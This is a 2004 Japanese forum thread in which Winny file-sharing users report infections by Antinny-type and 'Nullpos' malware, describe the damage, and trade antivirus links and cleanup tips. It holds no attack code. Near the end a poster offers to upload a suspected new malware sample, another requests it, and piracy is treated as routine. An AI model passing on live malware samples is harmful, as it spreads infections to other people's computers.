ありがとすごく勉強になった。

745 :[名無し]さん(bin+cue).rar:04/08/20 00:21 ID:tK8fcj3u
>>740
ITmediaのパクリ記事第二段かよ!

ほれ、新たなエサだ。

ttp://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_NULLPORCE.C&VSect=T


746 :[名無し]さん(bin+cue).rar:04/08/20 00:26 ID:4N67DJrB
今日ウイルスにやられますた。
昨日DLした何かを開き、HDDがガリガリいっていた。しかしガリガリはすぐやみ、
そのときは何事もなかった。数時間webサーフィンして電源OFF。

そして今日の朝起動、しかしインターネットができない。
再起動してが、それでもできない。とりあえずほっぽって朝飯を食いに行く。
1〜2時間後、帰ってきたらアイコンの数が妙に足りない・・・
スタートメニューもフォルダー以外なくなった・・・
とりあえず再起動、しかしNTローダーが無いと警告され、起動不能。

別のHDDにXPを入れてもとあったHDDの中を確認してみると・・・
フォルダー以外すべてのファイルが消失・・・
そしてシステムのあったドライブに一つのtxtデータが・・・

ファイル名"piracy.txt"
内容"you did a piracy. you deserve it."

もうwinnyは卒業します・・・。
全部なくなった・・・すべて・・・自業自得です。

俺みたいなアフォはいないかもしれないが、皆さん気をつけろYO!

747 :[名無し]さん(bin+cue).rar:04/08/20 00:29 ID:hpSDy6BV
うは〜

748 :[名無し]さん(bin+cue).rar:04/08/20 00:31 ID:4TN54Obe
>>746
ttp://www.symantec.com/region/jp/avcenter/venc/data/w32.delalot.b.trojan.html
これか。
つーかノートン入れときゃ余裕で防げるじゃねーか、、

749 :[名無し]さん(bin+cue).rar:04/08/20 00:39 ID:H+2TIZPI
まあ、キンタマで個人情報たっぷり晒した挙句卒業だと後の祭りだからな。
フォーマットですんでよかったと思わなきゃ☆

750 :746:04/08/20 00:55 ID:4N67DJrB
>>748
ウイルスソフトはいれてました・・・

751 :[名無し]さん(bin+cue).rar:04/08/20 00:59 ID:qM8rXX73
酒がウマイぜ〜w

752 :[名無し]さん(bin+cue).rar:04/08/20 01:00 ID:IhyPkpBM
>>750
ワロタw

753 :[名無し]さん(bin+cue).rar:04/08/20 01:01 ID:8LSawPyJ
>>746
exeファイル実行した?

754 :746:04/08/20 01:03 ID:4N67DJrB
>>753
記憶にございませんw、まあたぶんなんか開いたんでしょう・・・。

755 :[名無し]さん(bin+cue).rar:04/08/20 01:07 ID:4TN54Obe
>>754
Whiterの亜種だからたぶんAdobeやエロゲのインストーラーなどに仕込まれてるケースが多いと思われるが、、
なんかアプリ関係とか拾わなかった?

756 :[名無し]さん(bin+cue).rar:04/08/20 01:12 ID:qM8rXX73
他人の不幸はわらえ・・・



あんんまり笑えないなこの話は

757 :746:04/08/20 01:18 ID:4N67DJrB
>>755
あ・・・Adobe関連とエロゲのインストーラーDLしました。
やっちまったか・・・。
>>756
すべてなくなりました。きれいさっぱりw。

758 :[名無し]さん(bin+cue).rar:04/08/20 01:19 ID:2hgB6Nfq
>757
仮想PCを使うとか、そういう考えはなかったのか?

759 :[名無し]さん(bin+cue).rar:04/08/20 01:23 ID:qM8rXX73
っつーか別HDDにOS入れて復帰させるあたり
ド素人じゃなさそうなんだが、ウイルスに関しては無知だったのか?

760 :[名無し]さん(bin+cue).rar:04/08/20 01:23 ID:4N67DJrB
>>758
そういう風に頭が回っていれば、悲劇は起こらなかった・・・

sage

761 :[名無し]さん(bin+cue).rar:04/08/20 01:25 ID:KP6ygUBn
>>756 他人の不幸は蜜の味 では?
    そしてこのようなことは 明日は我が身 でもあります
    SSMによる予防措置と圧縮ファイルをdelexeにかける などのことを
    行っていれば防げたのかもしれませんが・・・

762 :[名無し]さん(bin+cue).rar:04/08/20 01:26 ID:/DiW1raL
気をつけような…
次はあなたかもしれない

763 :[名無し]さん(bin+cue).rar:04/08/20 01:27 ID:4TN54Obe
>>760
まぁ、気にするな。
喉元過ぎればなんとやら。
ショックでnyやめようとか考えてんのもたぶん今だけだw

>>761
インストーラーに偽装されていればSSMでは防ぎ様がない。
CDのautorunで実行されてしまうしな。

764 :746=760:04/08/20 01:36 ID:4N67DJrB
>>759
無知もいいとこでした。
いままでウイルスソフトもいれてなかったんです、
騒がれているので一応入れとこうかなぁって先日やっと入れたぐらい。
今まで何もウイルスに出会ったことがなかった・・・
ウイルスメールなんて来た事が無かった。
(時々オンラインウイルススキャンはしてたんです)

>>763
なんていうか、全部消されるとなんともいえない複雑な気持ちですね。
nyはあるエロゲがほしいためにインスコしたんです。
そしてそのエロゲをDLし終わって開いたらABONとw
nyの甘い蜜は吸っていないので、未練無しでつ。

最低限、重要な個人ファイルはバックアップ取っておいたので救いです。




765 :[名無し]さん(bin+cue).rar:04/08/20 01:36 ID:2hgB6Nfq
すみません,どなたか教えてください.

ぬるぽーすが怖いのでスタートアップチェッカーいれたんですが,
これってスタートアップフォルダそのものを無効にできないんです.
どうやったらスタートアップフォルダを無効にできますか?

レジストリ値とかおしえてください.

766 :[名無し]さん(bin+cue).rar:04/08/20 01:59 ID:KP6ygUBn
>>763 そうなのか 訂正dくすこ


767 :[名無し]さん(bin+cue).rar:04/08/20 02:03 ID:LhziK9Pl
ぬるぽーすとキンタマの連動が怖いから
しばらくzip系は開かないでおこう・・・

768 :[名無し]さん(bin+cue).rar:04/08/20 02:17 ID:hpSDy6BV
>>767はコレなので人生はいつも負け組みです

769 :[名無し]さん(bin+cue).rar:04/08/20 02:18 ID:fxZNHKeh
対策を講じない限り、今開いても来年開いても結果は同じだと思うのだが

770 :[名無し]さん(bin+cue).rar:04/08/20 02:20 ID:+rY2vNtM
PCにWinny winny2 両方入れています。
今ウィルスチェックしたら AntiWinny.kに感染していて

Winny(1)のフォルダに(X:\Winny)
X:\Winny\UP という隠しフォルダが造られ 【晒し挙げ】画像ほか 感染ファイルが大量に生成されていました。
画像の日付は新しくても一月前でした

win.ini に[hoge]も造られていました こちらの日付も一月前でした。

最近(今月内)まで実際にWinnyを使うときは
X:\Winny2 というフォルダに入れてあるWinny2を使っていたのですが
UpFolder.txt には自分で登録した覚えのないフォルダはありませんでした

自分ではWinny(1)を使っていたおぼえはないのですが
やはりデスクトップ画像は流出したモノと思った方がいいのでしょうか?


771 :[名無し]さん(bin+cue).rar:04/08/20 02:22 ID:AU94Uti1
>>770
だから!使わないダミーwinnyを4〜5つ作っとけって言ったのに

772 :770:04/08/20 02:31 ID:+rY2vNtM
すみませこの板来るのは初めてで
>>771
>ダミーwinnyを4〜5つ作っとけって
というのはウィルスがダミーのほうに感染して本来使うWinnyへの感染を回避できると言うことですか?

もしかしたら今回の場合
X:\Winny を私が使っているWinnyと誤解してこちらのフォルダやUpFolder.txtに感染し
そのままX:\Winnyの Winny(1)を使った場合にはファイルが流出しただろうけど

普段使っていた X:\Winny2に入れたWinny2は無事?で ファイル流出は起きなかったのか?
と思っているのですが.....(個人的希望)

実際に利用しているWinnyフォルダの UpFolder.txt の中に怪しいフォルダが無ければ
ファイル流出は起きていないと思ってもいいのですか?
使っていたwinny2の UpFolder.txt は3月の日付のままです

773 :[名無し]さん(bin+cue).rar:04/08/20 02:38 ID:AU94Uti1
自分の名前が流れてないか調べれ
キンタマ **名前 で検索してhitしてたらコンニチワ

774 :[名無し]さん(bin+cue).rar:04/08/20 03:10 ID:ixBQKycQ
先生使ってるやしはこれ入れ溶け
http://www.vector.co.jp/soft/winnt/util/se327620.html
LiveUpdateするより早くウィルスに対応するから少しは安全
既出かもしれませんが

775 :[名無し]さん(bin+cue).rar:04/08/20 04:33 ID:Eln7xHmV
>>772
流出は防げてるかもしれんね

でもしっかり感染してるようだから、DoS砲やデータ上書きは起こるんじゃね?
来月9日を楽しみになw

776 :[名無し]さん(bin+cue).rar:04/08/20 07:12 ID:53+X+5bG
他に実害はないのですが、キャッシュの中身が消えるという状態になっています。
upフォルダは生成されていませんし、win.iniでもぬるぽ等は出ていません。
また、普段のpcの使用にも不具合はありませんし、セーバーが出たりと言った症状もありません。
これもやはり何らかのウィルスと言うことなのでしょうか?
exeを踏んだと言うことも今のところありませんのです。

777 :[名無し]さん(bin+cue).rar:04/08/20 07:30 ID:YIaJDxwW
【使用OS】 Windows2000
【WindowsUpdateしてるか】している
【AntiVirusは】 ウイルスバスター2004
【ちゃんとUpdateしてるか】 している
【スキャンした結果】 ウイルス無し
【Winnyのバージョン】 winny v2.0 B7.1
【Winny歴、総DL量は】 1年 100Gくらい
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】 基本的な対策は全て施してみた

【症状か具体的に、分かる限りすべて書く】
数日前から午前6時30分頃になると
Zone Alarm Proが
"Winny.exeが外部にメールを送信しようとしています"
なる警告を出すようになったので
許可しないに設定した
送信先を調べた結果 富士通に送信しようとしていた

【何をしたらそんなことになったのか】
現在考えられるのは数日前にDLしたZIPファイル
ウイルス検索には引っ掛からなかったが
Explzhで中身覗いたら新しいフォルダ.exeなるものがあり
危険を感じたので解凍せずにそのまま削除した

【これまでにとった措置】
Zone Alarm Proの設定で
winny.exeのメール送信をブロックに設定した

新種ウイルスなのか
こちらの勘違いなのかわかりませんが
報告までにカキコさせて頂いたm(_ _m)

778 :[名無し]さん(bin+cue).rar:04/08/20 08:52 ID:WOxXAyG/
お、なんか変なのが出てきたな・・・
ウィルスか・・・

779 :[名無し]さん(bin+cue).rar:04/08/20 10:11 ID:DYwA+X6z
金玉踏んじゃいました。
おそらく再起動時と思われるのですが
Cドライブにあるtxtファイル,doc,xls,pptが「ぬるぽ…(1900行ほどのの改行)…ガッ」に書き換えられ、
jpg,dllも同じ内容(157,002byte)で上書きされました。
bmp,gif,png,ai,psd,pdf,Dドライブは無事でした。
既出だったらすんません。

780 :[名無し]さん(bin+cue).rar:04/08/20 10:19 ID:mlM1lF4c
そういえば苦楽のR5には田代砲がついているって本当?
まあ俺は黄派だけど

781 :[名無し]さん(bin+cue).rar:04/08/20 12:36 ID:5ocND+6d
>>777
http://www.forest.impress.co.jp/article/2004/07/30/arcsecurity.html
ここ見るかぎりどっかにファイルが解凍されてるっぽいな!

782 :[名無し]さん(bin+cue).rar:04/08/20 12:56 ID:dTtt3D0F
覗いただけで解凍か怖いな・・・
漏れはRAR使ってるが大丈夫なのかな

783 :[名無し]さん(bin+cue).rar:04/08/20 13:00 ID:qvuP1HSK
覗いただけで解凍ってありえる?

784 :[名無し]さん(bin+cue).rar:04/08/20 13:01 ID:4NXDZZ3Z
ほぼ対策されてるので最新版使えばどれでも問題ない

785 :[名無し]さん(bin+cue).rar:04/08/20 13:03 ID:dnvFa78y
>>777
ゾネプロ使ったこと無いからよくはわからんが、単に転送用ポートが25のノードに接続しようとしただけじゃないのか。
試しに適当なIP:25でノードを追加してみてくれ。

786 :[名無し]さん(bin+cue).rar:04/08/20 13:14 ID:4NXDZZ3Z
>>785
接続先が富士通らしいから、それだとそれはそれで祭りになりそうな
・・・今さら珍しくないか


787 :[名無し]さん(bin+cue).rar:04/08/20 13:25 ID:hpSDy6BV
自分のポート番号を25にしたら少しは祭りになるかな・・・

788 :[名無し]さん(bin+cue).rar:04/08/20 15:33 ID:cusjyBQp
このスレ開くとウイルスに感染するからみないほうがいいぞ

789 :[名無し]さん(bin+cue).rar:04/08/20 15:47 ID:Eln7xHmV
>>788
釣りだよな?

790 :[名無し]さん(bin+cue).rar:04/08/20 15:49 ID:QBggv165
釣りだよ

791 :[名無し]さん(bin+cue).rar:04/08/20 16:12 ID:jJnNw4Pz
うちのノートン先生が眠ってらっしゃるので
釣りです

792 :[名無し]さん(bin+cue).rar:04/08/20 16:42 ID:zcAPswjh
>>791
おまえんちのノートン先生は替え玉だよ

793 :[名無し]さん(bin+cue).rar:04/08/20 16:46 ID:QBggv165
まあ釣りだってのは重々承知だけどここはあえて
ノートンが反応するのはとある文章のみ。

これだけいえば十分だな

794 :[名無し]さん(bin+cue).rar:04/08/20 17:21 ID:l6DqnCP5
このスレみるたびに
恐怖感を募らせている自分だが、早いとこ
ny専用マシンをつくらないと「いけないな・・

795 :[名無し]さん(bin+cue).rar:04/08/20 17:24 ID:y1cWZU9y
>794
仮想PCでいいじゃん

796 :[名無し]さん(bin+cue).rar:04/08/20 17:35 ID:4FvT+Zd6
> 779
R5は父兄砲、R4はランダム接続。なんかそんなの。
(バイナリエディタで覗いてみよう)

797 :[名無し]さん(bin+cue).rar:04/08/20 18:27 ID:fxZNHKeh
漏れはVMwareに頼りっきりだが、盲信も危険だよな。
仮想PCからホストに感染しちゃうようなものが無いとも言えないし。



多分VMよりVPCの方が先に狙われるかなーとか思うけど。

798 :[名無し]さん(bin+cue).rar:04/08/20 20:31 ID:966XSNw8
今狙われてるのは、人気(?)コミックのzipか。
アプリとかエロゲーでexe開かざるを得ないものを落とす奴の気がしれんし。

799 :[名無し]さん(bin+cue).rar:04/08/20 20:33 ID:QBggv165
つーか漫画や同人誌なんてjpgしか入ってないんだから
exeなんて開きようないだろ

800 :[名無し]さん(bin+cue).rar:04/08/20 20:45 ID:966XSNw8
>>799
まぁ、いわゆる「脆弱性」を利用して、スタートアップに.exeを投下する、アーカイバの設定によって
「解凍後にフォルダを開く」から.folder連携で.exe実行ってのがあるからねぇ。
でも、事前に中見りゃ済む話なんだが・・・。

801 :[名無し]さん(bin+cue).rar:04/08/20 21:13 ID:deTVnx1p
HDDをフォーマットしようとすると
「このドライブはフォーマットできません。windowsが使用中のファイルが含まれています。」
ってなるんだけど。どうなってんの?

802 :[名無し]さん(bin+cue).rar:04/08/20 21:16 ID:fLUNTG97
そのまんまじゃん…

803 :[名無し]さん(bin+cue).rar:04/08/20 21:29 ID:deTVnx1p
初心者なもんで、わけ解らないんだ。

804 :[名無し]さん(bin+cue).rar:04/08/20 21:35 ID:7YcPteUh
じゃあ初心者スレ逝って来な

805 :[名無し]さん(bin+cue).rar:04/08/20 21:35 ID:lQ4N/rpt
釣りだよな?


806 :[名無し]さん(bin+cue).rar:04/08/20 21:47 ID:TO1OB+wS
初心者がnyやるなよ・・・

807 :[名無し]さん(bin+cue).rar:04/08/20 21:54 ID:KjkmvhGg
システムファイル入ってるHDDをフォーマットしようとしてるのか
おめでてーな

808 :[名無し]さん(bin+cue).rar:04/08/20 22:07 ID:SvmsXTPz
>>801は存在そのものがWHITERだなw

809 :[名無し]さん(bin+cue).rar:04/08/20 22:14 ID:kYuS/VJb
多分フォーマットして再インスコしようとしてるんだろうが
再インスコする時に新しくインスコするを選べば
フォーマットもついでにできるよ

810 :[名無し]さん(bin+cue).rar:04/08/20 22:16 ID:GVqKWhkZ
>>809
ここを初心者板にしたいのか?

811 :[名無し]さん(bin+cue).rar:04/08/20 23:58 ID:1puwxwvV
「ウイルスセキュリティ」更新するとネット接続不可に
http://internet.watch.impress.co.jp/cda/news/2004/08/19/4293.html


812 :[名無し]さん(bin+cue).rar:04/08/21 00:58 ID:aPOZdkLL
初心者がnyやるキッカケってなんなんだろう?
ネトランはもうny見捨ててるようだしなぁ・・・。

813 :[名無し]さん(bin+cue).rar:04/08/21 01:03 ID:RlT/M6+3
おい、酒がまずいぞ
もっと絶望感丸出しのレスはないのか

814 :[名無し]さん(bin+cue).rar:04/08/21 01:30 ID:+/GL6rLe
>>813
よろしく

815 :[名無し]さん(bin+cue).rar:04/08/21 01:37 ID:8Y1LiOZ4
最近NISが調子悪くウィルス情報の更新はいいのだがプログラムの更新に失敗していた
一月ほど特に気にしていなかったが

昨日気まぐれでNISをアンインストして再度入れ直してコンピュータのウィルスチェックやったら
AntiWinny.Kに感染していた.....

成り行き....
初代AntiWinnyが流行する直前はWinnyをしばらく休んでいて感染は免れたが
逆に話題になってからウィルス情報も有るから心配ないだろうとタカをくくっていた
【キンタマ】画像を集めては笑いの種にしていた
しばらくの内は「DLするファイルにAntiWinnyが感染している」のNISが警告してくれたし
これなら安全と思い込んでいた
そこで気づかないうちに上記のプログラム更新の失敗が重なっていた
この状態ではプログラムが更新されないので
それまでのデータベースのウィルスの検知は問題ないが 最新のウィルスに対応できなかったようだ
ものの見事にAntiWinny.Kに感染していた......

みんなノートンがいるから安心なんて思い込んだら泣きを見るぞ
馬鹿なユーザなら
「アップデートに失敗するようなソフトのせいでウィルスに感染した これはシマンテックの責任だ!」
なんて訴える奴もいそうな気がする(私は自分の愚かさに気づきシマンテックには十分感謝している)

816 :[名無し]さん(bin+cue).rar:04/08/21 01:46 ID:cY9N6fjo
とりあえずキンタマ集めてバチがあたったな

817 :[名無し]さん(bin+cue).rar:04/08/21 01:50 ID:aPOZdkLL
少なくともこのスレの住人はアンチウイルスソフトの最新バージョン
常駐させても、それで安心とは思ってないだろうなぁ。
つーか、Antinnyだったらテンプレの対応策取ってりゃ、ほぼ踏むこ
とは無いと思うがなぁ・・・。

818 :[名無し]さん(bin+cue).rar:04/08/21 01:51 ID:8Y1LiOZ4
まさに「ミイラ取りがミイラ」

819 :[名無し]さん(bin+cue).rar:04/08/21 01:52 ID:iFmMA4JU
最新のウィルス?
AntinnyKは初期からあったやつじゃないか
更新失敗してからノートン自体が働いてなかったんじゃないのか?

バチがあたったには同意

820 :[名無し]さん(bin+cue).rar:04/08/21 02:01 ID:VNHqNfQw
NGにキンタマ 晒し デスクトップ入れて
エロ動画を嗜むのが紳士ってもんだろ
最新映画とかsetup系落として自爆するのはアホ

821 :[名無し]さん(bin+cue).rar:04/08/21 03:07 ID:/KC1ML7r
Antinny.Kはキンタマの改良版だから初期じゃなくて中期じゃね?

822 :[名無し]さん(bin+cue).rar:04/08/21 03:22 ID:6yVDLkg8
Downフォルダー開くと、ワトソン先生と同じプロセス名のモノが起動してPCがフリーズするようになった。
ノートンでスキャンしても反応せず・・・OTL Downフォルダーをリネームして開くと問題無いから Winnyを狙ったものかなぁ・・と

823 :[名無し]さん(bin+cue).rar:04/08/21 03:44 ID:sl5R4QUt
http://pc6.2ch.net/test/read.cgi/pc/1091371359/880
新種かな
なんかおもしれーぞ〜

824 :[名無し]さん(bin+cue).rar:04/08/21 04:57 ID:toiOEHiD
>>823
880はその前の879のレスをヌルポ風に変えたネタだボケ

825 :[名無し]さん(bin+cue).rar:04/08/21 05:21 ID:k0GfBGT3
もしもそれがあったらとても欲しいな
ボタンとか全部ぬるぽになってて欲しい

826 :[名無し]さん(bin+cue).rar:04/08/21 05:37 ID:/g/eqJsh
>>822
 >>3


827 :823:04/08/21 05:46 ID:sl5R4QUt
朝なので本気でボケてます

828 :[名無し]さん(bin+cue).rar:04/08/21 06:23 ID:7qhZRL2X
>>825
クリックしたら全部ガッされるのか

829 :[名無し]さん(bin+cue).rar:04/08/21 09:00 ID:fOhe/Jdf
最近はscrでも感染するのね
NGワードにしようっと

830 :777:04/08/21 09:03 ID:RWlYtWvB
追記
winny.exeが書き換えられておりました
サイズは同じだけど ファイルの更新日時が変わってました

とりあえずZone Alarmでメール送信は禁止しているのと
winny.exeを削除後 正規の物に変えました

今後他にも何かしら症状が出たら報告させて頂きます

831 :[名無し]さん(bin+cue).rar:04/08/21 09:32 ID:blDEnIqE
.scrの実体は.exeだもんな

832 :[名無し]さん(bin+cue).rar:04/08/21 12:15 ID:v8mTKLWg
ギシアンをシステム復元で解決しねぇ。
復元は出来るがあいかわらず起動と同時にギシアン起動。
もう、だめぽ。

833 :[名無し]さん(bin+cue).rar:04/08/21 12:33 ID:6yVDLkg8
>>832
・ファイル名指定して実行”msconfig”で常駐切る
・ファイル名指定して実行”regedit”でスタートアップの部分をチェックする


834 :[名無し]さん(bin+cue).rar:04/08/21 12:38 ID:3iQt0P+1
scrファイルうっかり触ってしまって壁紙が起動するたび蓮コラになるんだけど解決方法ある?
スタートアップに何もないからmsconfigのスタートアップのどれかだと思うんだけど

835 :[名無し]さん(bin+cue).rar:04/08/21 12:39 ID:ZeeTk85n
>>833
レスサンクス
やってみるわ。

836 :[名無し]さん(bin+cue).rar:04/08/21 12:45 ID:ZeeTk85n
>>833
だめだ。
ファイル名指定して実行でプログラム実行すると
ギシアン起動しちまう。
もうクリーンインスコするわ。

837 :[名無し]さん(bin+cue).rar:04/08/21 14:54 ID:fOhe/Jdf
>>834
必殺再インストール

838 :[名無し]さん(bin+cue).rar:04/08/21 15:21 ID:yN3J4D+F
なんでもかんでも.exe動かすと起動するっていってなかったっけ?
だったらその関連付け解除せんと

839 :[名無し]さん(bin+cue).rar:04/08/21 15:31 ID:6yVDLkg8
>>836
system32フォルダーに入ってるからそこから開けない?

840 :[名無し]さん(bin+cue).rar:04/08/21 15:41 ID:UWraso7h
eTrustのフリー版でAntinny.Qと判定されるファイルはノートン等では何に当たるのでしょうか?
不用意にWinRAR上から.exeを実行したので駆除、テンプレやリンク先の確認部分をチェック
再起動後も確認してひとまず安心しているのですが、Antinny.Qの情報がなく不安が残っています。

ttp://www.casupport.jp/virusinfo/

ここにはAntinny.Dまでの情報しかないようなので質問しました。よろしくお願いします。

841 :[名無し]さん(bin+cue).rar:04/08/21 16:00 ID:KTtvwWEX
ウイルスが入ってた時、ノートンが自動でどこかに隔離してくれいるのですが、
そのファイルはどこに移動されているのかわかる方いますか?

842 :[名無し]さん(bin+cue).rar:04/08/21 16:04 ID:4vPpZseG
>>841
HDDの中の奥深く

843 :[名無し]さん(bin+cue).rar:04/08/21 16:05 ID:IcI6/bg5
(・∀・)

844 :[名無し]さん(bin+cue).rar:04/08/21 16:06 ID:RlT/M6+3
>>841
夢と現実の狭間

845 :[名無し]さん(bin+cue).rar:04/08/21 16:17 ID:KTtvwWEX
windoctorを使用すると見つかりましたが、また隔離されました

846 :[名無し]さん(bin+cue).rar:04/08/21 16:25 ID:elXE6lw4
アンチウィルスソフトの使用相談スレじゃないわけで
自分の使ってるソフトぐらい把握汁

847 :[名無し]さん(bin+cue).rar:04/08/21 16:44 ID:/KC1ML7r
つか脳豚の質問ならシマンテック池

848 :[名無し]さん(bin+cue).rar:04/08/21 17:40 ID:cmKh3iuX
>>11これみてファイルとかレジストリの中とか消したんだけど
ctl+alt+delでレジストリエディタがひらいてしまう・・・
治らないんですか?コレばっかりは・・・

849 :[名無し]さん(bin+cue).rar:04/08/21 17:53 ID:GBHoGmZa
つーか
ここって質問者以外に感染者があまりいないから
細部を聞かれても答えられないんじゃない?

850 :[名無し]さん(bin+cue).rar:04/08/21 17:59 ID:YlIbGjIl
>>848
http://www.symantec.co.jp/region/jp/avcenter/venc/data/jp-trojan.nullpos.html

851 :[名無し]さん(bin+cue).rar:04/08/21 18:27 ID:cmKh3iuX
>>850
サンクス
とりあえずSP2消したら直りました。

852 :[名無し]さん(bin+cue).rar:04/08/21 18:39 ID:h4/BEKjO
Winnyやってないけど
ノートが
ぬるぽーすに感染…

記憶にない(´・ω・`)

853 :[名無し]さん(bin+cue).rar:04/08/21 18:42 ID:iFb/wppE
>>852
出所不明のファイルを開いた悪寒。
メールとかFDとかCD-Rとかダウンロードフォルダを確認してみれ。

854 :[名無し]さん(bin+cue).rar:04/08/21 18:51 ID:2Nd1aMgh
>>841
霧の立ち込む森の奥深く

855 :[名無し]さん(bin+cue).rar:04/08/21 18:59 ID:Y1ffQJtt
>>854
少女を運ぶ謎の老人

856 :[名無し]さん(bin+cue).rar:04/08/21 19:23 ID:hcTRW8Qq
>>855
誰も知らぬ秘密の館

857 :[名無し]さん(bin+cue).rar:04/08/21 19:25 ID:w8n5tag4
終了

858 :[名無し]さん(bin+cue).rar:04/08/21 19:50 ID:nvtR6rQN
>>856
生きたまま蝋人形の如く

859 :[名無し]さん(bin+cue).rar:04/08/21 19:57 ID:Uj6l+a3D
震えて眠れ 明日はもうないさ


860 :[名無し]さん(bin+cue).rar:04/08/21 20:28 ID:HJFY9kJs
今日になって、やっとバスターが「かっとばせぬるぽーす」に対応してくれた

861 :[名無し]さん(bin+cue).rar:04/08/21 20:40 ID:k8StBm6u
今夜もひとり 生贄になる

862 :[名無し]さん(bin+cue).rar:04/08/21 20:45 ID:OWjMP4xV
妹が間違ってデスノ.zipクリック解凍して、ぬるぽウィルスにかかってた

んで、デスクトップのファイルをマイドキュメントに移動するようだが
なんでかちょっとしか移動してなく、ある程度消えてた
たいしたファイル無かったから良かったが、やはり重要なのはデスクトップやCドライブにないほうがいいな

avast使ってるが対応してないのか、設定だったかで感染してしまった
ss.ragを消したりして手動でやったけど、HPに無いEXEあった。名前忘れたけど

タスクマネージャーもレジストリ消されるので、追加しないとたぶん使えない
ぐぐればすぐわかる

TASKなんたらEXEもアイコンが書き換えられて違うのな

863 :862の妹:04/08/21 21:27 ID:nmtepJHX
お兄ちゃんが勝手に引っかかったんでしょ!
人のせいにしないでよ!!

864 :[名無し]さん(bin+cue).rar:04/08/21 21:30 ID:W3atOBuS
おいおい、お前たち。
お父さんの立場も考えてくれよな、ただでさえ捜査資料がキンタマ漏れして
パソコンの自宅利用が厳しくなってるんだから。

865 :[名無し]さん(bin+cue).rar:04/08/21 21:38 ID:J1YIae1g
パパは警察官w

866 :862の兄:04/08/21 21:47 ID:V0OIbpOt
お前もか弟よ。
俺の立場も考えてくれよな、ただでさえ自衛官の内部資料がキンタマ漏れして
パソコンの自宅利用が厳しくなってるんだから。

867 :[名無し]さん(bin+cue).rar:04/08/21 21:58 ID:LUDAE+9O
【使用OS】 windowsXP
【WindowsUpdateしてるか】 しています
【AntiVirusは】ウイルスバスター
【ちゃんとUpdateしてるか】
【スキャンした結果】何もでませんでした
【オンラインスキャンしたならその結果は】でません
【Winnyのバージョン】 Winny2b71
【Winny歴、総DL量は】 4ケ月
【テンプレを読んだか】 読みました
【テンプレにある対策を実行したか】
【症状か具体的に、分かる限りすべて書く】
UPフォルダができてキャッシュが消えている。
WIN.iniに「ぬるぽ」の文字がある。
winnyをしても検索に1・2個くらいしかでない。
【何をしたらそんなことになったのか】
zipを解凍したらなりました。
【これまでにとった措置】
以前にlzhを解凍して同じようになったのでウイルスバスターで検索して
削除しました。(←antinnyでした)なので同じように検索しましたが、まず何も出てきません。
WIN.iniに「ぬるぽ」を削除してみました。

どうすればいいんでしょうか?検索にひっかからないので何なのかわかりません。

868 :[名無し]さん(bin+cue).rar:04/08/21 22:18 ID:bVN66zlk
テンプレぐらい読んだんだろうな?

869 :[名無し]さん(bin+cue).rar:04/08/21 22:27 ID:LUDAE+9O
>868
 867のことでしょうか?読んではみましたが・・・他のwinnyスレでantinnyの
ことが書いてあったので実行して以前はなったんですが・・同じ症状の
ようなのですが検索ででてこないんです。

870 :[名無し]さん(bin+cue).rar:04/08/21 22:28 ID:W3atOBuS
864が父親(59)=刑殺姦
866が長男(24)=痔嬰癇
862が次男(17)=工房
863が長女(14)=厨房

↓母親(56)求む

871 :[名無し]さん(bin+cue).rar:04/08/21 22:30 ID:kpZ0GIT/
>>867
バスターは製品版が入ってるのか?

872 :[名無し]さん(bin+cue).rar:04/08/21 22:43 ID:LUDAE+9O
>>871
 いいえ、体験版です。ノートンが入っていたのですが、誤って
 消してしまったので体験版使ってます。

873 :[名無し]さん(bin+cue).rar:04/08/21 22:52 ID:hcTRW8Qq
>>861
叫べ 呪え 吼えろ 怒れ 殺せ!

874 :[名無し]さん(bin+cue).rar:04/08/21 22:59 ID:fBzJv+oY
864の母でございます。

この度は(ry


875 :[名無し]さん(bin+cue).rar:04/08/21 23:02 ID:GBHoGmZa
何もなかったように俺は現場を立ち去っる

876 :[名無し]さん(bin+cue).rar:04/08/21 23:02 ID:2FVQw6cI
一応新種ウイルスらしき物体を報告。
【使用OS】 Winows XP Professional
【WindowsUpdateしてるか】 はい
【AntiVirusは】 ウイルスバスター2004 パターン2.160
【ちゃんとUpdateしてるか】 はい
【スキャンした結果】 なし
【Winnyのバージョン】 b7.1
【Winny歴、総DL量は】 半年、10G
新種っぽいウイルスの報告。
特徴
・キンタマと同じアイコン。
・同人誌内に混入
・ウイルスバスターで検出されず
とりあえず報告・・・
踏んでないからよかった・・
一応トレンドには報告。

877 :[名無し]さん(bin+cue).rar:04/08/21 23:04 ID:k8StBm6u
>>867
二度も解凍系でやられたのなら、
綺麗さっぱりクリーンインスコして、金輪際nyには手を出さない方が良いかと。


二度あることは(ry

878 :[名無し]さん(bin+cue).rar:04/08/21 23:08 ID:nHEJYz7v
>>876
>・キンタマと同じアイコン。



879 :876:04/08/21 23:09 ID:2FVQw6cI
訂正、メモ帳のアイコン

880 :[名無し]さん(bin+cue).rar:04/08/21 23:12 ID:Tigjap4t
やってしまった…



(・∀・)コンニチハ!!

881 :[名無し]さん(bin+cue).rar:04/08/21 23:16 ID:Zn3h9oJI
>>876
報告乙!
ファイルはexeですか?

882 :880:04/08/21 23:17 ID:Tigjap4t
しかし、某アレでUP0にしてたんだけど
これなら大丈夫かな?
一応全部アンインスコしたけど

883 :[名無し]さん(bin+cue).rar:04/08/21 23:18 ID:B8azsR+p
もはやUPするしないを問題にする段階ではないことくらい
このスレをちょっと見ればわかりそうなもんだが

884 :[名無し]さん(bin+cue).rar:04/08/21 23:31 ID:/KC1ML7r
よく「メモ帳のアイコン」って見るんだけどさ、
それって「テキストファイルのアイコン」じゃねーのか?

「メモ帳のアイコン」ってのはnotepad.exeの水色帳面アイコンだと思うんだがどーよ

885 :[名無し]さん(bin+cue).rar:04/08/21 23:35 ID:7KeM255I
>>884
だからメモ帳のアイコンってことだろ。

886 :876:04/08/21 23:53 ID:2FVQw6cI
>>881
そうです。
Serial.exe
ですた。好き者がいればうpしますので

887 :[名無し]さん(bin+cue).rar:04/08/22 00:08 ID:EY9ZyhuW
スキ物だから暗号化ZIPでウプキボン

888 :[名無し]さん(bin+cue).rar:04/08/22 00:44 ID:sjpGlT1L
Share.exeってのがノートンに反応した
すぐ消したけど

889 :[名無し]さん(bin+cue).rar:04/08/22 00:51 ID:xTOXjbjo
>>882
Up0のアレは仕込まれ物だってことを、まだ気付かない香具師がいたのか


890 :[名無し]さん(bin+cue).rar:04/08/22 00:52 ID:V4WtyPeP
